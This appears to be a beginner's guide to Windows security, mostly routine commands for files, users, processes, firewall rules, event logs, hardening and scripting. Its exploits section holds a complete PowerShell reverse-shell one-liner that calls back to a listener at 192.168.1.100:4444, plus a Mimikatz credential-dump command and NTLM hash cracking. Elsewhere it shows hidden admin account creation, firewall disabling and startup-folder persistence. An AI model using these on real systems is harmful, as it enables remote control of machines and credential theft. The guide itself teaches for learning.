🔹 Windows for Cybersecurity – Full Guide¶

Windows is widely used in enterprise environments, making it a key target for cybersecurity threats. Understanding Windows security, PowerShell, Active Directory, and forensic analysis is essential for cybersecurity professionals.

1️⃣ Windows Basics¶

Before focusing on security, let's cover essential Windows commands.

📌 File & Directory Management¶

List files in a directory:
```
dir
```
Change directory:
```
cd C:\Windows\System32
```

Copy a file:

copy C:\Users\user\Desktop\file.txt C:\Backup\

Move/Rename a file:
```
move old.txt new.txt
```
Delete a file:
```
del file.txt
```
Create a new folder:
```
mkdir C:\NewFolder
```

2️⃣ User & Group Management¶

📌 Managing Users¶

List all users:
```
net user
```
Create a new user:
```
net user hacker P@ssw0rd /add
```
Delete a user:
```
net user hacker /delete
```
Check user privileges:
```
whoami /priv
```

Add user to Administrators group:

net localgroup Administrators hacker /add

📌 Managing Groups¶

List all groups:
```
net localgroup
```

Add a user to a group:

net localgroup "Remote Desktop Users" hacker /add

3️⃣ Process & Task Management¶

Monitoring processes is important for detecting malware.

List all running processes:
```
tasklist
```
Kill a process by name:
```
taskkill /IM notepad.exe /F
```
Kill a process by PID:
```
taskkill /PID 1234 /F
```
View detailed process information:
```
Get-Process | Format-Table -AutoSize
```

Monitor real-time resource usage:

Get-Process | Sort-Object CPU -Descending | Select-Object -First 10

4️⃣ Windows Firewall & Network Security¶

📌 Windows Firewall¶

Check firewall status:
```
netsh advfirewall show allprofiles
```

Block a specific port:

netsh advfirewall firewall add rule name="Block_Port_445" dir=in action=block protocol=TCP localport=445

Allow SSH connections:

netsh advfirewall firewall add rule name="Allow SSH" dir=in action=allow protocol=TCP localport=22

Disable Windows Firewall:

netsh advfirewall set allprofiles state off

📌 Network Analysis¶

Check active connections:
```
netstat -ano
```
Find which process is using a port:
```
netstat -ano | findstr :443
```

Scan open ports (using PowerShell):

Test-NetConnection -ComputerName google.com -Port 443

Check system ARP cache:
```
arp -a
```

5️⃣ Log Monitoring & Forensic Analysis¶

Windows logs are stored in Event Viewer and can be analyzed with PowerShell.

View security logs:

Get-EventLog -LogName Security -Newest 10

Find failed login attempts:

Get-EventLog -LogName Security | Where-Object { $_.EventID -eq 4625 }

Find successful logins:

Get-EventLog -LogName Security | Where-Object { $_.EventID -eq 4624 }

Check system errors:

Get-EventLog -LogName System -Newest 20

6️⃣ Windows Hardening & Security¶

Hardening Windows helps prevent cyber attacks.

📌 Disable Guest Account¶

net user guest /active:no

📌 Disable SMBv1 (to prevent ransomware)¶

Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

📌 Enable BitLocker for Disk Encryption¶

Enable-BitLocker -MountPoint "C:" -EncryptionMethod AES256

📌 Enable Windows Defender¶

Set-MpPreference -DisableRealtimeMonitoring $false

📌 Restrict RDP Access¶

netsh advfirewall firewall add rule name="Block RDP" dir=in action=block protocol=TCP localport=3389

7️⃣ Ethical Hacking with Windows¶

Windows is used in penetration testing and security auditing.

📌 Common Pentesting Tools¶

Tool	Purpose
Metasploit	Exploit vulnerabilities
Nmap	Scan networks & ports
Mimikatz	Dump passwords from memory
Wireshark	Capture network traffic
PowerSploit	Exploit PowerShell vulnerabilities
Responder	Capture NTLM hashes
John the Ripper	Crack passwords

8️⃣ Windows Exploits & Defense¶

📌 Privilege Escalation¶

Check privileges:
```
whoami /priv
```

Check for unquoted service paths (can be exploited):

wmic service get name,displayname,pathname | findstr /i "C:\Program Files\"

📌 Password Cracking¶

Dump password hashes with Mimikatz:
```
sekurlsa::logonpasswords
```
Crack NTLM hashes:
```
john --format=NTLM hashes.txt
```

📌 Reverse Shell (Ethical Hacking)¶

Start a listener on Kali Linux:
```
nc -lvnp 4444
```

Connect to the listener (Windows):

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.100",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};$client.Close()

9️⃣ Windows Scripting Concepts¶

Windows supports batch scripting, PowerShell, and VBScript.

📌 Batch Scripting (Basic)¶

@echo off
echo Hello, Hacker!
pause

📌 PowerShell Scripting (Advanced)¶

$users = Get-LocalUser
foreach ($user in $users) {
    Write-Output "User: $($user.Name) - Enabled: $($user.Enabled)"
}

📌 Automating Tasks with PowerShell¶

Schedule a script to run daily:

schtasks /create /tn "DailyScript" /tr "C:\Scripts\secure.ps1" /sc daily /st 12:00

🔹 Windows Scripting Concepts¶

Windows supports multiple scripting languages for automation, security testing, and system administration. The three most common scripting languages are:

Batch Scripting (.bat) – Simple command-line automation.
PowerShell Scripting (.ps1) – Advanced automation & security scripting.
VBScript (.vbs) – Legacy scripting for automation (less common now).

1️⃣ Batch Scripting (`.bat`)¶

Batch scripts are simple command-line scripts used for automation.

📌 Basic Batch Script Example¶

@echo off
echo Hello, Windows Security!
pause

@echo off → Hides command execution from the console.
echo → Prints a message to the screen.
pause → Waits for user input before closing.

📌 Creating a Batch Script¶

Open Notepad
Write the script.
Save it as script.bat (not .txt).
Double-click to run it.

📌 Automating Tasks with Batch¶

🔹 Create a Folder & Move Files¶

@echo off
mkdir C:\Backup
move C:\Users\yuva\Desktop\*.txt C:\Backup

🔹 Delete Temporary Files¶

@echo off
del C:\Windows\Temp\*.tmp /s /q

🔹 Run a Program at Startup¶

@echo off
copy myscript.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

2️⃣ PowerShell Scripting (`.ps1`)¶

PowerShell is a powerful automation framework that integrates deeply with Windows.

📌 Basic PowerShell Script¶

Write-Output "Hello, Cybersecurity!"

📌 Creating a PowerShell Script¶

Open Notepad
Write your script.
Save it as script.ps1

Run it using:

powershell -ExecutionPolicy Bypass -File script.ps1

📌 Managing System Users¶

🔹 List all users¶

Get-LocalUser

🔹 Create a new user¶

New-LocalUser -Name "hacker" -Password (ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force) -FullName "Ethical Hacker"

🔹 Delete a user¶

Remove-LocalUser -Name "hacker"

📌 Automate Windows Firewall¶

🔹 Block a port¶

New-NetFirewallRule -DisplayName "Block Port 445" -Direction Inbound -Protocol TCP -LocalPort 445 -Action Block

🔹 Allow SSH¶

New-NetFirewallRule -DisplayName "Allow SSH" -Direction Inbound -Protocol TCP -LocalPort 22 -Action Allow

📌 Scheduled Task Automation¶

🔹 Run a script daily at 12 PM¶

$Trigger = New-ScheduledTaskTrigger -Daily -At 12:00PM
$Action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "C:\Scripts\secure.ps1"
Register-ScheduledTask -TaskName "DailySecurityCheck" -Trigger $Trigger -Action $Action -User "SYSTEM" -RunLevel Highest -Force

3️⃣ VBScript (`.vbs`)¶

VBScript is older and less secure but is still used in legacy systems.

📌 Basic VBScript Example¶

MsgBox "Hello, Windows Security!", vbInformation, "Security Alert"

MsgBox → Displays a popup message.

📌 Automate File Management¶

🔹 Create a folder & copy files¶

Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.CreateFolder "C:\Backup"
objFSO.CopyFile "C:\Users\yuva\Desktop\*.txt", "C:\Backup\"

🔹 Open Notepad¶

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "notepad.exe"

4️⃣ Comparison of Windows Scripting Languages¶

Feature	Batch (.bat)	PowerShell (.ps1)	VBScript (.vbs)
Ease of Use	✅ Simple	✅ Advanced but easy	❌ Complex
System Control	❌ Limited	✅ Full Windows Control	⚠️ Legacy
Security	❌ Weak	✅ Secure	❌ Weak
Automation	✅ Basic	✅ Advanced	⚠️ Legacy

🛡️ Which one should you learn?¶

For basic automation → Use Batch
For cybersecurity & administration → Use PowerShell
For legacy systems → Use VBScript (only if required)